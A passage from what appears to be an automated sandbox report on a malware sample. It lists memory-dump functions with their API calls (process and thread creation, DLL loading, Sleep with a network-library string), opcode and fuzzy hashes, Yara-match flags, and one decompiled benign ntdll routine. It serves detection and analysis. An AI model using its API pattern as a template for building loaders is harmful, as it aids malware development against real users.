                                                                        • Instruction Fuzzy Hash: 90900266251000032105A5590704507004AD7D5395755C0A5F1406550CE661D8716161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 34316d7e40e229f0f2b340f09053b7df88f5e94cc78937b357fc3535e8f3188c
                                                                        • Instruction ID: 1ef3f580a4802f91927693ee63229f7ff96a7dd5d070cf8b51a2a32bbaad4535
                                                                        • Opcode Fuzzy Hash: 34316d7e40e229f0f2b340f09053b7df88f5e94cc78937b357fc3535e8f3188c
                                                                        • Instruction Fuzzy Hash: F190027224108802F1106159840474A0009D7D0345F59C495A4815658D96D5D8A17161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f1577861566ea5f87651eddefff7319863c2ac79011349e450b3d94365c2bb31
                                                                        • Instruction ID: 57d50eb4acb4814ffd2106d8dc42492e0c4124f64a7b22969c4d581942157536
                                                                        • Opcode Fuzzy Hash: f1577861566ea5f87651eddefff7319863c2ac79011349e450b3d94365c2bb31
                                                                        • Instruction Fuzzy Hash: A990027224100842F10061594404B460009D7E0345F55C09AA0515654D9655D8617561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 33628b85958150140b57bec4fcda77c3a84630a1b5c1a3d1ea24e026e036145f
                                                                        • Instruction ID: 27b57d462f8edbf15d5115a8dcdf9547f8b3a5e0959ce27b94ebb8ba77ce91e7
                                                                        • Opcode Fuzzy Hash: 33628b85958150140b57bec4fcda77c3a84630a1b5c1a3d1ea24e026e036145f
                                                                        • Instruction Fuzzy Hash: AA90027224100802F1807159440464A0009D7D1345F95C099A0416654DDA55DA6977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 943380796c4d3f5ade7915a9f1d3b41a59fc4ac9624c8648596765d3e2cd2db3
                                                                        • Instruction ID: 36f364567876e0af62b5b423ab8603b52173f0e510ac6ceb7b560f36f31457b1
                                                                        • Opcode Fuzzy Hash: 943380796c4d3f5ade7915a9f1d3b41a59fc4ac9624c8648596765d3e2cd2db3
                                                                        • Instruction Fuzzy Hash: 6790026225180042F20065694C14B070009D7D0347F55C199A0545554CD955D8716561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 368cd24a0c171b2415b09b844fbdc897ba574d610435ee94fa354044394c3cb3
                                                                        • Instruction ID: 12c272111006f414eb3c5c17feb2078bfca796d6ebb476e4963703822dfca33d
                                                                        • Opcode Fuzzy Hash: 368cd24a0c171b2415b09b844fbdc897ba574d610435ee94fa354044394c3cb3
                                                                        • Instruction Fuzzy Hash: 5190027224504842F14071594404A460019D7D0349F55C095A0455694DA665DD65B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1a03c467a38a03ce55dc5966f5759da5cbfca1673f4905ffbf1238266604c586
                                                                        • Instruction ID: d1c96fede809c096e30180808082803e7701cbb0c663a7c424a7bd8cc0dcf372
                                                                        • Opcode Fuzzy Hash: 1a03c467a38a03ce55dc5966f5759da5cbfca1673f4905ffbf1238266604c586
                                                                        • Instruction Fuzzy Hash: EB90026A25300002F1807159540860A0009D7D1246F95D499A0406558CD955D8796361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 706f3d448ef565575e95eb997358315cc7b672d02d04701055bf3625710a1aa4
                                                                        • Instruction ID: 42eec268418e7a0ef489cf73996462728c7ecddd6c7ce08c0ed6d01adaa3b172
                                                                        • Opcode Fuzzy Hash: 706f3d448ef565575e95eb997358315cc7b672d02d04701055bf3625710a1aa4
                                                                        • Instruction Fuzzy Hash: 6890027235114402F110615984047060009D7D1245F55C495A0C15558D96D5D8A17162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 80762ad8c8b82801d8d1a1a56af8d27c9838d423b97e8ad26c26222deaab7a2f
                                                                        • Instruction ID: d60c9c52115f6df94f962044104578ab83d81489a81ea2cfe87cf69eba22ac20
                                                                        • Opcode Fuzzy Hash: 80762ad8c8b82801d8d1a1a56af8d27c9838d423b97e8ad26c26222deaab7a2f
                                                                        • Instruction Fuzzy Hash: F790027224100402F100659954086460009D7E0345F55D095A5415555ED6A5D8A17171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00946ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00946F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
                                                                        • Instruction ID: 4c49c9e5b33eedc40f098f73a92e50b5f6b931e7b9c07d625558bdf1366607c2
                                                                        • Opcode Fuzzy Hash: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
                                                                        • Instruction Fuzzy Hash: 3431A1B1601704ABC715DFA8D8A1FA7BBB8FB88704F00845DF65A9B241D730B945CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00946EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00946F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: 726b6fee09d3caee2e24f487463294dd982a4f10985aa744aa6e09ec356c7239
                                                                        • Instruction ID: 4b10becf7b4b8da568b44d497616b1554c231f11b3e0d34f2a6acc23844b0835
                                                                        • Opcode Fuzzy Hash: 726b6fee09d3caee2e24f487463294dd982a4f10985aa744aa6e09ec356c7239
                                                                        • Instruction Fuzzy Hash: 1531D6B1601704ABC710DFA4D8A1FABBBB8FF89704F10815DFA595B242D370A945CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009484B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00933B93), ref: 009484ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                                        • Instruction ID: c4c46675e8b6ceaf58e8012690dbbce68cef1af3c43ba7ceaae7d2dcbc39a9cd
                                                                        • Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
                                                                        • Instruction Fuzzy Hash: ADE06DB1200204ABDB14EF64CC49EAB376CAF88750F114199FE085B382D531E901CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009484C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00933B93), ref: 009484ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 1cf5824c86937706e4610102931d3be6f2ae3d72fb17582b3dd5a4480404c56f
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: 70E01AB12002046BDB14EF59CC45EA777ACAF88750F014554FA085B281CA30E9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00937260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009372BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009372DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction ID: 603bc49098bf312cccf8915548a25398e6efe5fb5019fc4c6ea8aa63bc2d1feb
                                                                        • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                        • Instruction Fuzzy Hash: EA01A771A8022877E720A6949C03FFF776C5B40B50F144115FF04BA1C2E6E4690646F5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0094852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00948584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                                        • Instruction ID: 4a573a738e19bfaed6ce4497249041c8a4a8747fbeb02c567a039013228aef5e
                                                                        • Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
                                                                        • Instruction Fuzzy Hash: DA1105B2200108BBCB04DF98DC80EEB77ADAF8C754F118258FA0D97241DA30E9118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00939B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00939B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: f269a80d32db9d91843d7d909b088298393b18fa9714d1add03007f1d8d7299e
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: B701E1B5D4020DBBDF10EBE4EC82F9EB7789B54308F104195E91897241F671EB59CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948447, Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00943506,?,00943C7F,00943C7F,?,00943506,?,?,?,?,?,00000000,00000000,?), ref: 009484AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                                        • Instruction ID: 556dc09cee7c1988db61074c7c2dc3c86c5c32d3c872fdff9a24e593c6a4dc76
                                                                        • Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
                                                                        • Instruction Fuzzy Hash: 9BF062767002156FDB24EF98DC84EEB736DEFC8360B108559FA4C9B251C931EA158BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00948584
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: 81c62ee24da1533c72c3b1a2b18a8b38e26f850aa131d24683a428457ab565e8
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: 8901AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00946FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0093CCC0,?,?), ref: 0094703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                        • Instruction ID: 961536378233423575f3245a9440a7999ecc541f73ed2b77b43b8edadfc5ae74
                                                                        • Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
                                                                        • Instruction Fuzzy Hash: BCF09B7234121077D7306658DC43FE7725CDB95B50F250019FB49AB2C1D9D5F90246E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00947000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0093CCC0,?,?), ref: 0094703C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                        • Instruction ID: 35d2c9dc660d0e516f74e9ef77ed164b07f1518be9fd5fa5068812b35c88db45
                                                                        • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                        • Instruction Fuzzy Hash: B2E092333813043AE33065A9AC03FA7B39CCBC1B20F140026FA0DEB2C1D595F90142A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00943506,?,00943C7F,00943C7F,?,00943506,?,?,?,?,?,00000000,00000000,?), ref: 009484AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: d3ba9f9b5ec78dc60da7893c59d9dbb559093720239032397c4bbe7ef0620eac
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: 48E012B1200208ABDB14EF99CC41EAB77ACAF88650F118558FA085B282CA30F9108AF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0093CF92,0093CF92,?,00000000,?,?), ref: 00948650
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: f7b0ae9581c6737ac22d2750667720e43786725cfc3cc3f5ab07f30e320e5f2c
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: CFE01AB16002086BDB10EF49CC85EEB37ADAF88650F018154FA085B281C930E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0093D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00937C63,?), ref: 0093D42B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 7d62ec106e90a9cce5b8fbfb8313f84dfaf0c070633cae365d2c5e454882c3fd
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 1BD0A7717903043BE610FAA49C07F2732CD9B45B00F494064F948D73C3D960F5004561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a7eb6f2ba4f52cf2fa894df0dde403e9536211bdb6f01f146efb0c44b96c1a1d
                                                                        • Instruction ID: e0b4307588730cd244b7cf62f8a995f1cbcf09bd28c1d1e96cc6bc57207f27f2
                                                                        • Opcode Fuzzy Hash: a7eb6f2ba4f52cf2fa894df0dde403e9536211bdb6f01f146efb0c44b96c1a1d
                                                                        • Instruction Fuzzy Hash: 25B09BB29414C5C5F711D76046087177904F7D0745F16C0E5D1420645A4778D0A1F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 04C1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E04C1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04BCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04C15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04C15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x04c1fdda
                                                                        0x04c1fde2
                                                                        0x04c1fde5
                                                                        0x04c1fdec
                                                                        0x04c1fdfa
                                                                        0x04c1fdff
                                                                        0x04c1fe0a
                                                                        0x04c1fe0f
                                                                        0x04c1fe17
                                                                        0x04c1fe1e
                                                                        0x04c1fe19
                                                                        0x04c1fe19
                                                                        0x04c1fe19
                                                                        0x04c1fe20
                                                                        0x04c1fe21
                                                                        0x04c1fe22
                                                                        0x04c1fe25
                                                                        0x04c1fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C1FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C1FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C1FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: a1208942c326ec79a1502084c3593ee525d21d0b729456bbce87e665dcd164c8
                                                                        • Instruction ID: 76b1f246a55dfd8134a0a554b0d6dcc5e4bd721d59926b1db668662e91d0bc4c
                                                                        • Opcode Fuzzy Hash: a1208942c326ec79a1502084c3593ee525d21d0b729456bbce87e665dcd164c8
                                                                        • Instruction Fuzzy Hash: ADF0F632200201BFE6251A55DC42F23BF6BEB86730F140358F628561F1EA62F860A6F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%